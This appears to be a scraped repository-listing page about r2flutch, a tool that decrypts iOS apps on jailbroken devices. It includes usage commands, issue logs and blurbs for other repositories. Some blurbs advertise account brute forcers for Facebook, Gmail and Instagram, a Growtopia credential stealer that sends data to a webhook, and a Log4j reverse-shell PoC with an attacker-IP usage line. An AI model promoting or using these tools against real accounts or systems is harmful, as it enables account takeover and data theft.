Tool to decrypt iOS apps using r2frida

Last update: Jan 03, 2023

Overview

r2flutch

Yet another tool to decrypt iOS apps using r2frida.

Requirements

It requires to install Frida on the Jailbroken iOS device:

Jailbroken device
Frida installed on the device. (e.g. via Cydia) https://frida.re/docs/ios/#with-jailbreak
radare2 installed. https://github.com/radareorg/radare2

Installation

Using PIP:

pip install r2flutch

Using r2pm

r2pm -ci r2flutch

Usage

Run r2flutch -l to list all the installed apps.

Run r2flutch -i <App Bundle> to pull a decrypted IPA from the device.

Run r2flutch <App Bundle> to pull the decrypted app binary from the device.

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭

331 Jan 1, 2023

Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

149 Aug 10, 2022

labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

16 Dec 8, 2022

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible For That.

1 Jan 10, 2022

A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

12 Dec 30, 2022

Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

3 Apr 9, 2022

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

An auxiliary tool for iot vulnerability hunter

firmeye - IoT固件漏洞挖掘工具 firmeye 是一个 IDA 插件，基于敏感函数参数回溯来辅助漏洞挖掘。我们知道，在固件漏洞挖掘中，从敏感/危险函数出发，寻找其参数来源，是一种很有效的漏洞挖掘方法，但程序中调用敏感函数的地方非常多，人工分析耗时费力，通过该插件，可以帮助排除大部分的安全

171 Nov 28, 2022

DNS hijacking via dead records automation tool

DeadDNS Multi-threaded DNS hijacking via dead records automation tool How it works 1) Dig provided subdomains file for dead DNS records. 2) Dig the fo

45 Dec 20, 2022

Comments

Error Dumping Application

When attempting to dump an application I ran into this error. Any suggestions on how to proceed?

r2flutch XXXXX
[+] Open Application Process XXXXX
resumed spawned process.
[+] Mount Application Bundle
Mounted io on /r2f at 0x0
[+] Set block size to 0x80000

Invalid address (XXXXXw)
|ERROR| Invalid command 'mdj /r2f/AppBundle/assets/node_modules/@XXXX' (0x6d)

opened by bmbernie 4

ERROR - Failed to copy file: .gitkeep

iOS: 14.6 Device: iphone 7 Jailbrake tool: checkrain

radare2: 5.5.4

MacBook-Pro-di-xspam:jan xspam$ r2flutch -i com.adobe.PSMobile [+] Open Application Process com.adobe.PSMobile resumed spawned process. [+] Mount Application Bundle Mounted io on /r2f at 0x0 [+] Set block size to 0x400000

[+] Loading all modules [+] Dumping Module PS Express at 0x104b1d000 (0x1000 Bytes) Dumped 4096 bytes from 0x104b1d000 into /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/dump/PS Express File 'PS Express' created. (size: 101806432 bytes) [+] Writing decrypted data to file /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/bin/PS Express at 0x21000 [+] Patching cryptid at offset 0x11b0 [+] Module /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/bin/PS Express successfully decrypted [+] Copy application bundle to: /var/folders/s1/t_833fyx34n_5r4xvjmd6kzr0000gn/T/r2flutch-diqkax00/Payload/PS Express.app [+] Copy App Bundle to disk 15%|█████████████████████▋ | 613/4069 [01:03<03:24, 16.90it/s][x] ERROR - Failed to copy file: .gitkeep 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4069/4069 [14:24<00:00, 4.71it/s] [+] Creating IPA file at ./PS Express.ipa [+] IPA file saved at ./PS Express.ipa [*] SUCCESS - r2flutch Decryption Complete!

opened by itsmylife44 1

ERROR - Cannot open target process

$ r2flutch -d -i uk.co.llamasoft.gridrunner
[+] Open Application Process uk.co.llamasoft.gridrunner
[r] Cannot open 'frida://launch/usb/644ceeafa65960cb3a2249b2f6a8b7702381d15b/uk.co.llamasoft.gridrunner'
[x] ERROR - Cannot open target process: uk.co.llamasoft.gridrunner

iOS: 10.3.3 (14G60) Device: iPad mini 2 (ME277B/A) Jailbrake tool: sockH3lix

radare2: 5.4.2 (via brew)

opened by gingerbeardman 1

Releases(1.0.3)

1.0.3(Feb 10, 2022)

Source code(tar.gz)
Source code(zip)
1.0.2(Dec 10, 2021)

Increases blocksize to 4MB.

Recommended updating r2frida to the latest version.
Source code(tar.gz)
Source code(zip)

Owner

Murphy

GitHub Repository

An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

2 Dec 16, 2021

The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

114 Dec 26, 2022

POC using subprocess lib in Python 🐍

POC subprocess ☞ POC using the subprocess library with Python. References: https://github.com/GuillaumeFalourd/poc-subprocess https://geekflare.com/le

2 Nov 28, 2022

A secure password generator written in python

gruvbox-factory 🏭 "The main focus when developing gruvbox is to keep colors easily distinguishable, contrast enough and still pleasant for the eyes"

430 Dec 27, 2022

AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not

AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not. The program requests the hash of the file and outputs information (if any). This version will

1 Jan 03, 2022

AMC- Automatic Media Access Control [MAC] Address Spoofing Tool

AMC (Automatic Media Access Control [MAC] Address Spoofing tool), helps you to protect your real network hardware identity. Each entered time interval your hardware address was changed automatically.

14 Dec 23, 2022

Collection Of Discord Hacking Tools / Fun Stuff / Exploits That Is Completely Made Using Python.

Venom Collection Of Discord Hacking Tools / Fun Stuff / Exploits That Is Completely Made Using Python. Report Bug · Request Feature Contributing Well,

25 Dec 06, 2022

Growtopia Save.dat Stealer

savedat-stealer Growtopia Save.dat Stealer (Auto Send To Webhook) How To Use After Change Webhook URL Compile script to exe Give to target Done Info C

9 May 01, 2022

Encrypted Python Password Manager

PyPassKeep Encrypted Python Password Manager About PyPassKeep (PPK for short) is an encrypted python password manager used to secure your passwords fr

1 Nov 17, 2021

A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF.

TProxer A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF. How • Install • Todo • Join Discord How it works

162 Nov 25, 2022

Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

16 Mar 24, 2022

MS-FSRVP coercion abuse PoC

ShadowCoerce MS-FSRVP coercion abuse PoC Credits: Gilles LIONEL (a.k.a. Topotam)

219 Dec 28, 2022

This is a simple PoC for the newly found Polkit error names PwnKit

A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz

16 Sep 06, 2022

A deobfuscator for multiple python obfuscators

PY4COC A deobfuscator for multiple python obfuscators, supports exe's packed with pyinstaller too. How to use python3 py4coc.py exe file or py file o

16 Dec 03, 2022

Herramienta para descargar eventos de Sucuri WAF hacia disco.

Descarga los eventos de Sucuri Script para descargar los eventos del Sucuri Web Application Firewall (WAF) en el disco como archivos CSV. Requerimient

2 Nov 29, 2021

A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

48 Dec 19, 2022

聚合Github上已有的Poc或者Exp，CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp，CVE信息来自CVE官网注意：只通过通用的CVE号聚合，因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞，还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

567 Dec 30, 2022

Password-Manager GUI

PASSWORD-MANAGER This repo contains all the project files. Project Description A Tkinter GUI that allows you to store website info like website name,

1 Dec 08, 2021

Searches through git repositories for high entropy strings and secrets, digging deep into commit history

truffleHog Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accident

10.1k Jan 09, 2023

Brute Force Guess the password for Instgram accounts with python

Brute-Force-instagram Guess the password for Instgram accounts Tool features : It has two modes: 1- Combo system from you 2- Automatic (random) system

45 Dec 11, 2022